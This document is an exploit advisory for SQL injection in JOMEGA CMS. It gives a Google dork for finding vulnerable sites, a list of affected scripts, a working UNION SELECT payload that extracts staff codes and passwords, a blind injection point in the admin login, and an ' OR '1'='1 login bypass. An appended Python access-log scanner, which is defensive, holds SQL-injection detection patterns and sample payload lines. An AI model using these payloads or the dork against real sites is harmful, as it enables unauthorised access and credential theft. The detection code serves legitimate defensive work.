[$] Exploit Title : JOMEGA CMS SQL Injection
[$] Versions Affected : ALL
[$] Date : 10-07-2011
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : SQL Injection
[$] Google Dork : inurl:"showPG.php?Id="

[$] Vulnerable files:
    /showCACedit.php
    /showEVedit.php
    /showFQedit.php
    /showFRedit.php
    /showFregedit.php
    /showIFedit.php
    /showNTedit.php
    /showPGedit.php
    /showRGedit.php
    /showRQedit.php

[$] Exploit
    [+] http://[site]/showPG.php?Id=1 <- [SQL INJECTION]
    [+] e.g. http://example.pt/showPG.php?Id=-1'+union+all+select+1,(select+concat(cod_func,0x3a,password)+from+funcionarios)+,0x30,0x30,0x30,0x30,0x30+and+'1'='1

[#] The Admin Panel is vulnerable too.

[$] Vulnerable files:
    /gestor/login.php

[$] Exploit
    [+] http://[site]/gestor/login.php?cod_func=LOL <- [BLIND SQL INJECTION]

[#] You can also bypass the username field using: ' OR '1'='1

[$] Greetings from PORTUGAL ^^
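
A defender-side check for the requests this advisory describes, added here as an example and not part of the original advisory or the JOMEGA code: it scans web access-log lines for the listed scripts and flags Id or cod_func values that look injected. The log format, the sample lines, and the rules for what counts as a legitimate value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names from the advisory; showPG.php comes from its example URL.
WATCHED = tuple(f"/show{n}.php" for n in (
    "pg", "cacedit", "evedit", "fqedit", "fredit", "fregedit",
    "ifedit", "ntedit", "pgedit", "rgedit", "rqedit")) + ("/gestor/login.php",)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQLI = re.compile(r"""['"]|--|/\*|\b(?:union|select|sleep|benchmark)\b""", re.I)

def suspicious_params(target):
    """Return (name, value) pairs in a request target that look injected."""
    url = urlsplit(target)
    if not url.path.lower().endswith(WATCHED):
        return []
    hits = []
    # parse_qsl percent-decodes and maps '+' to a space, as PHP does for $_GET.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        key = name.lower()
        # Assumption: a legitimate Id is an unsigned decimal integer.
        if key == "id" and not (value.isascii() and value.isdecimal()):
            hits.append((name, value))
        # Assumption: cod_func never carries quotes, comments or SQL keywords.
        elif key == "cod_func" and SQLI.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (client, status, name, value) for each flagged parameter."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            client, target, status = m.groups()
            findings += [(client, status, n, v)
                         for n, v in suspicious_params(target)]
    return findings

# Constructed sample lines in combined log format, not real traffic.
SAMPLE = [
    '192.0.2.10 - - [10/Jul/2011:12:00:01 +0100] "GET /showPG.php?Id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jul/2011:12:03:44 +0100] "GET /showPG.php?Id=-1%27+union+all+select+1,2 HTTP/1.1" 200 5340',
    '198.51.100.7 - - [10/Jul/2011:12:04:02 +0100] "GET /cms/gestor/login.php?cod_func=x%27+OR+%271%27%3D%271 HTTP/1.1" 200 910',
    '192.0.2.10 - - [10/Jul/2011:12:05:10 +0100] "GET /gestor/login.php?cod_func=1042 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Access logs do not record POST bodies, so an injection submitted through the login form's username field needs application-level or WAF logging to be seen.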